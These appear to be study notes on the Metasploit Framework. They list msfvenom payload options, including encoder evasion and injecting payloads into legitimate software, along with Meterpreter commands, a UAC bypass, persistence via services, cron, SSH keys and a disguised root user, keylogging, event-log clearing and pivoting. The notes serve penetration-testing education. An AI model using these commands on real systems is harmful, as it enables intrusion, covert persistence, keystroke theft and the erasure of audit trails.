Notes

Metasploit Framework

Back


Metasploit Framework (MSF)

The Metasploit Framework (MSF) is an open-source, robust penetration testing and exploitation framework that is used by penetration testers and security researchers worldwide.

Essential Terminology


Metasploit Framework Architecture

test

MSF Modules


MSF Payload Types

The Meterpreter (Meta-Interpreter) payload is an advanced multi-functional payload that is executed in memory on the target system making it difficult to detect.It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system that facilitates the execution of system commands, file system navigation, keylogging and much more.


Setup and Configuration

msfconsole Fundamentals


Workspaces

Workspaces allow you to keep track of all your osts, scans and activities and are extremely useful when conducting penetration tests as they allow you to sort and organize your data based on the target or organization.

Usage:


Import nmap result into msfconsole

Do nmap scan and store output in XML format.Create a workspace. Import results using db_import nmap_xml_result command.

OR

Use db_nmap to perform nmap scan.

hosts : Host in nmap results services : Services discoverd vulns : Find vulnerabilities


Route traffic through machine

Run following command on meterpreter session. run autoroute -s IP_to_route_through

Information gathering

FTP

SSH

SMB

SMTP

HTTP

MySql


msfvenom

Generating msfvenom payload

msfvenom –list payloads : To list all payloads msfvenom –list format : To list all formats of payload

Staged payload : /meterpreter/type Unstaged payload : /meterpreter_type

-p : payload path LHOST : Attacker IP LPORT : Attacker Port -f : file type like exe -a : architecture

-e : encoder (-e x86/shikata_ga_nai) -i : iterations of encoding

-x : inject payload in actual software and replace it to exploit -k : keep original functionality of software plus exploit


meterpreter session basic

sessions : Show all ongoing sessions ( -C : Run meterpreter command on any session -l : list active session -k : kill session -n : name session -i : id of session )

sysinfo : System Information getuid : user permission and level download : download file upload : upload file checksum md5 : MD5 checksum getenv PATH : get environment path search : search for file ( -f : file extension -d : directory to search in ) shell : native session ps : process list migrate id : migrate to process execute -f command : execute command on machine


Upgrade shell to meterpreter

use multi/manage/shell_to_meterpreter to upgrade use sessions -u id


Windows POST

post/windows/manage/migrate : migrate to other service post/windows/manage/archmigrate : migrate architecture

windows/gather/win_privs : Gather user windows privilege windows/gather/enum_logged_on_users : Gather information regarding logged in users windows/gather/checkvm : Check if machine is Virtual machine windows/gather/enum_applications : Enumerate installed application versions windows/gather/enum_av_excluded : Excluded folders from antivirus scan windows/gather/enum_computers : Enumerate computers included in AD Domain. windows/gather/enum_patches : Enumerate patches installed on system windows/gather/enum_shares : Enumerate shares target is part of

UAC bypass

windows/local/bypassuac_injection : UAC bypass (Match architecture for payloads)

Persistence on windows

windows/local/persistence_service : Add persistence via service

windows/manage/enable_rdp : Enable RDP on system Use net user user password for adding password to users. Use xfreerdp /u:username /p:password /v:host to connect to RDP.

Keylogging

Get meterpreter session keyscan_start : Start key logging keyscan_dump : Dump captured key_stroke keyscan_stop : Stop keylogging

Windows logs clearing

Logs can be accessed from Event Viewer We require elevated privilege for clearing logs Use clearev in meterpreter command to clear logs


Linux Post Exploitation Modules

Modules use to gather information post exploitation phase.

Exploiting vulnerable program

ps aux to find running services check if any service is vulnerable

exploit/unix/local/chkrootkit : To get root privilege

Hashdump

Establishing Persistence On Linux

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Add user on system having root privilege and name of service account such as ftp. useradd -m username -s shell passwd username usermod -aG root username usermod -u user_id username

linux/local/cron_persistence : Manipulate cronjob for persistence exploit/linux/local/service_persistence : Add persistence via service post/linux/manage/sshkey_persistence : Add SSH key for persistence


Pivoting

Pivoting is a post exploitation technique that involves utilizing a compromised host to attack other systems on the compromised host’s private internal network.

run autoroute -s ip_subnet

port forwarding via meterpreter session portfwd add -l local_port -p pivot_port -r pivot_machine

While running attack on pivot machine, Change payload to bind payload and set LHOST to machine we have exploited.


Armitage

GUI version of msfconsole